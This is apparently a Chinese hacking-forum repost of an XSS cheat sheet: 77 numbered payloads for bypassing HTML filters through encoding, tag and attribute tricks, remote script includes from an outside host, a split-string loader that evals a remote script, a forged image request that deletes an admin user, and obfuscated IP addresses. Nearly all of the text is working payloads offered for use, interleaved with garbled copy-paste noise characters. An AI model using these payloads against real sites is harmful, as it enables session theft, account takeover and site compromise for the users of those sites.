貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; P; p) v) b( Q' x
(1)普通的XSS JavaScript注入6 s5 O3 N# }5 H0 O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 `0 g) O9 M7 u T, O
(2)IMG标签XSS使用JavaScript命令( U) P8 W- b9 x4 f! n( B
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 g8 a% w# f. B) Z, S# w8 `# s2 I: e(3)IMG标签无分号无引号6 E3 @8 o0 `) O: r/ [: K+ W$ }
<IMG SRC=javascript:alert(‘XSS’)>
# v4 [; W5 m2 E+ V(4)IMG标签大小写不敏感
# Q E( u) Z% b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* W1 N" [# [% y2 a# x2 g(5)HTML编码(必须有分号)
+ f! K, {. u# I) `$ p: ^& W<IMG SRC=javascript:alert(“XSS”)>
0 @/ I2 v, c0 M" `(6)修正缺陷IMG标签
% a# @& L# K) L* c<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
b/ A. s5 G1 B% u9 e( m) {0 m' m) ?- |( s9 Z
7 l7 P7 e8 G' |, M, J
(7)formCharCode标签(计算器)
% v# Y! ^# ~6 m6 D: U. Z, i<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% W! ^2 k2 s+ I3 q; {
(8)UTF-8的Unicode编码(计算器)$ h( |: M/ ^4 `& u$ A# m' \
<IMG SRC=jav..省略..S')>) E a0 i5 I& c4 c; }7 _
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ s; O( ]0 k5 u) g" N( }% e" v
<IMG SRC=jav..省略..S')>
/ W0 n* K2 D4 d" [" F5 \(10)十六进制编码也是没有分号(计算器): ^* [( Q p* I6 g/ ^7 W$ s3 J
<IMG SRC=java..省略..XSS')>) x& h; m8 q9 X* W2 ?* p+ }
(11)嵌入式标签,将Javascript分开
+ H% \. R$ o/ E<IMG SRC=”jav ascript:alert(‘XSS’);”>- w, `% H5 u: k2 g* a0 U* F
(12)嵌入式编码标签,将Javascript分开
7 [; r) Q# U% z& k7 |% l; M<IMG SRC=”jav ascript:alert(‘XSS’);”>
: j7 G; {# |% `) u% E/ ~(13)嵌入式换行符. ~, o2 e9 H) _: a8 V7 x C! u
<IMG SRC=”jav ascript:alert(‘XSS’);”>, U& H& t# T$ B
(14)嵌入式回车 e! Y$ t$ U! g2 A$ ^+ B) k! H' V
<IMG SRC=”jav ascript:alert(‘XSS’);”>& m$ m2 [' y1 p% J$ {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 a0 L' r9 n$ U. W2 n- \% R<IMG SRC=”javascript:alert(‘XSS‘)”>
* s4 X) p& }: o% K) V(16)解决限制字符(要求同页面)
/ c K6 L4 j- N$ V8 k3 @* L<script>z=’document.’</script>
, Y7 \4 G3 y o' G9 E1 a3 r- |" u<script>z=z+’write(“‘</script>
* P$ m# f F$ g7 ~& w$ C- h<script>z=z+’<script’</script>( m, |! q9 G( ?- c! {
<script>z=z+’ src=ht’</script>9 G8 A7 i7 s5 Q) e
<script>z=z+’tp://ww’</script>
) }7 U) T; x6 J: d0 Z2 M9 W<script>z=z+’w.shell’</script>
. R2 b- Y U- s) _0 p, f<script>z=z+’.net/1.’</script>, Z/ w) E+ I5 d1 H' `
<script>z=z+’js></sc’</script>
4 A7 e1 N1 i9 ~2 q( Y<script>z=z+’ript>”)’</script># J, x# d9 ^2 ]3 P7 j0 x4 l$ w
<script>eval_r(z)</script>4 U. X0 {% X# E6 \
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
, m+ V! S1 [) U/ uhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 i) t- h) U% p% nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; A4 @' ^5 t8 T(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 _. P2 P" G* j7 ^) ~perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# K3 z: X+ h- ^, _1 g4 \- _# P# x
(19)Spaces和meta前的IMG标签
9 N* v1 i! a+ L1 ~% h" \3 g<IMG SRC=” javascript:alert(‘XSS’);”>
T4 `4 Q x$ i% J- ]3 u(20)Non-alpha-non-digit XSS; N8 m! K& M) i$ b, M. ]
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 s6 S2 p; }' s' C1 U7 N(21)Non-alpha-non-digit XSS to 2+ P" r/ ?; E9 b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 Y" k, r# k5 @( z: x' @
(22)Non-alpha-non-digit XSS to 3
+ y$ l+ P5 A2 Z3 G<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 d8 { c& `' ^) P7 B3 Z& m
(23)双开括号. W' u$ M) J+ `6 z z: {- e
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ E: i1 J3 U$ L1 \(24)无结束脚本标记(仅火狐等浏览器)
( U" D4 ~, l% n3 R8 r' K7 i2 a<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; l$ T K: _4 ?/ b8 M) r) [
(25)无结束脚本标记27 x& ~' ^0 e4 P4 H ~
<SCRIPT SRC=//3w.org/XSS/xss.js>
. ?0 D D, ^. k$ H% a; U5 I(26)半开的HTML/JavaScript XSS7 j: Y. e; l; N) ~8 h
<IMG SRC=”javascript:alert(‘XSS’)”
& a! E' ^3 ?* Y8 F! c(27)双开角括号% y& N' `3 u8 S, |+ F$ q: P' B; s
<iframe src=http://3w.org/XSS.html <- m7 @' N% _* i+ F
(28)无单引号 双引号 分号& ~5 e; i, H _1 K. o
<SCRIPT>a=/XSS/
/ w+ A& Z7 F# i/ palert(a.source)</SCRIPT>! [) G: T5 I* z @3 y9 w- m4 [
(29)换码过滤的JavaScript
5 Z% L1 f/ F8 s4 w- w\”;alert(‘XSS’);//
2 Y3 f; ?, ?! N- C0 b(30)结束Title标签
* e! b$ s3 N8 M. D! E</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% I2 a* [& C; @( H
(31)Input Image
+ e; L( z: w( ~/ ~' {<INPUT SRC=”javascript:alert(‘XSS’);”>8 w' O2 t% i! b+ f4 _' H- o
(32)BODY Image& ^/ O: |- d1 Q5 f5 W/ |
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; Z$ ^% ?0 j+ o) J7 d(33)BODY标签
; Y- t% G' g8 ` v8 t8 M/ J& ]: _<BODY(‘XSS’)>
* d+ l) P" ~: P(34)IMG Dynsrc$ s7 K) W2 F* N; u9 P6 G6 ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 {0 J7 _1 {8 R8 Y3 C/ R/ P- x(35)IMG Lowsrc
4 X) s" {/ O9 Q# i: G+ K4 g<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, Y! `; o0 ?; L(36)BGSOUND3 |% t/ ^: m3 b/ j$ |
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ O$ s6 G- @% h; i(37)STYLE sheet k2 _; p @, }4 T) [. P2 M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. U# W3 c4 P* R) m/ X, o(38)远程样式表3 b7 `( ]( R& J, H. H* X% ?
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 |! l8 Y: a& ^5 ^
(39)List-style-image(列表式)! Y1 g, B5 o* p* a2 F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* P( Y6 `+ e# W8 M) a(40)IMG VBscript
, L8 u' n1 v: W1 J+ D. \$ P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
. m+ w$ n, B$ H# P" y) T7 P(41)META链接url
. e; j3 \: j9 r$ w; }2 @ Y. k: Q: C4 x: a# g9 }# K' c* A; r
9 i* _6 v$ m9 s; p1 E$ {
<META HTTP-EQUIV=”refresh” CONTENT=”0;
1 i/ h3 r) ]2 u. Q' _; ^% T# @+ TURL=http://;URL=javascript:alert(‘XSS’);”>
# |9 z9 x- [% b, E& d; L/ e/ q(42)Iframe
' L- @- x5 p3 b# y" Y+ h5 C<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 i/ p) a- p2 U0 A( S, s8 k& g/ Q(43)Frame
' K0 D5 t+ s/ w" l<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board$ \: C) H! @; k" [& u! B3 S
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
& o4 p9 d7 R' K* b(44)Table2 V$ t! } B; g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* M5 H9 t$ R' P. |3 r9 p(45)TD0 C- r; z$ {/ Z1 s6 d9 ?
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 a! H, U4 B5 A0 _0 A(46)DIV background-image
( f7 a8 c0 `6 P! _/ m<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- Q" _7 N! i- R. J
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-* ? j6 x0 c' D* d9 e3 c
8&13&12288&65279)
& f! ?( N: r- m& S. P9 y! V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 f8 v) S3 l3 g+ [4 P& G- ^3 _5 z
(48)DIV expression1 q0 f5 I0 w$ I) E( d. l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 I7 O1 D, G$ b(49)STYLE属性分拆表达$ q& O6 O& \+ `, N6 y- B
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 X4 @( ?! I2 ^/ Z* @* O(50)匿名STYLE(组成:开角号和一个字母开头)
% E# U0 L9 }: O1 L8 a# e<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% l2 I1 n, c$ E7 i9 E5 s0 r(51)STYLE background-image6 Q5 `8 J! O% V/ P I+ X, }+ @
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A5 Y$ E9 P4 o: ^% }! L
CLASS=XSS></A>/ u* K8 F6 m. b: d' l
(52)IMG STYLE方式
! H/ _; s7 J6 [# Sexppression(alert(“XSS”))’>
! T$ v" K6 {$ q; n- y- u(53)STYLE background
& I+ Q5 g' h3 E% A( ~7 _* \5 {<STYLE><STYLE L2 {: Z# n2 z& b8 h1 ^5 w! V* H
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% t0 L' r# U% C& h. F$ m/ S
(54)BASE2 O( G' X; {4 J2 L- w
<BASE HREF=”javascript:alert(‘XSS’);//”>
) n6 _: W( k4 j4 C3 q, [(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 E" R4 F( d2 B# Z: d<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
" y* r( y8 u! J7 q(56)在flash中使用ActionScrpt可以混进你XSS的代码
4 Z+ G' ^$ @2 x$ u7 x& _a=”get”;5 m; u5 y; g y: @" p% J6 Q
b=”URL(\”";
1 K& r, V: h- c2 @c=”javascript:”;
. ^( S3 \: s) P( j' Z- fd=”alert(‘XSS’);\”)”;# {, E. |! ?9 D# c
eval_r(a+b+c+d);
0 P; F0 |4 a, U! S+ m(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
u& i) D, T( C% j4 D<HTML xmlns:xss>* {2 v% C2 _8 f
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 _! V4 J' T6 d& P* N4 j: j0 T4 N4 i<xss:xss>XSS</xss:xss>5 O8 I \9 j3 D+ ^* ~; d: S
</HTML>
8 C1 B* }0 v: O9 U(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
: R6 c5 ?& V3 o/ G/ ?<SCRIPT SRC=””></SCRIPT>
9 Q6 [9 \; e k" Q; y; o) a! c% S(59)IMG嵌入式命令,可执行任意命令
" Z4 r8 M' C0 {<IMG SRC=”http://www.XXX.com/a.php?a=b”>
, t8 q% G4 S9 d7 P: n# A(60)IMG嵌入式命令(a.jpg在同服务器)0 U8 i+ a* R! l
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% J* j8 O1 p+ \+ o* E4 s3 v$ }
(61)绕符号过滤9 m% Z5 m3 m1 o1 m* |5 i1 n
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( T: @+ X2 ~ u6 \
(62)
4 `' I: c! ]2 _7 l<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; o; g; _+ {1 u; B
(63): V7 W- q5 X5 i5 x
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 O9 o/ q3 O1 G, c; m
(64)
; h6 q, Y; A. V1 h! r: S7 M1 I<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT># N+ I' g; r0 }2 J3 a
(65)+ O1 n4 l L- z/ L0 n& p
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>! I! q5 F# S$ ^: ?& ^/ a! k
(66)12-7-1 T00LS - Powered by Discuz! Board
4 ~. n6 D2 i7 k% y* @# c. S$ uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/60 }" m7 w7 E5 a5 r# K, I
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' Y# D8 Z" n& {(67)
- Q, N4 Z0 q! }<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
$ v9 W+ \# X: E. N/ U</SCRIPT>
" G' p) ~& z3 a(68)URL绕行5 t# b, B+ N9 o& }8 {7 b. r& U1 T
<A HREF=”http://127.0.0.1/”>XSS</A>4 [* L) |7 z9 z; [$ l5 O
(69)URL编码, c9 j+ f% ], m, f9 T- r% R
<A HREF=”http://3w.org”>XSS</A>
$ Z$ W' c3 o3 H1 v- g(70)IP十进制# |: f7 B0 {( U" X$ E5 A6 |' I
<A HREF=”http://3232235521″>XSS</A>
9 B: N& H% g. X7 T. {0 q(71)IP十六进制& G8 y0 v4 Z) k2 q6 D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 h: L. k, X w0 o6 t
(72)IP八进制6 D( ^8 X2 Q8 b6 h
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 D n1 l d! X J/ K9 P& E(73)混合编码; P5 w& \$ Z2 Q5 Q' B, w& E
<A HREF=”h6 A9 m3 v* V; m$ _ Z: D) w' Y
tt p://6 6.000146.0×7.147/”">XSS</A>
7 H4 `- H+ J. ]. A# c(74)节省[http:]
* ~% f/ F8 j' L, r5 f$ k<A HREF=”//www.google.com/”>XSS</A>& B( Q) r5 o' ^! D0 q
(75)节省[www]
* A1 ?, j( p: S% H B X<A HREF=”http://google.com/”>XSS</A>
) g2 u7 l" m' J(76)绝对点绝对DNS/ q! i) |( j/ q X* Y! U2 s) n3 |
<A HREF=”http://www.google.com./”>XSS</A>5 o8 }1 g# V" N8 g! P. V* T; `
(77)javascript链接1 z4 W3 v3 E( x2 |. m- u8 ~4 {
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
! {1 |" l4 N: h$ y" _" o( ^1 R1 G2 \/ R5 y9 t6 T# g: U
原文地址:http://fuzzexp.org/u/0day/?p=14
- o5 c: E' I8 u, a- n' [6 [: X( `- B& M: j! x5 d
|
发表于 2013-4-19 19:22:37
收藏
支持
反对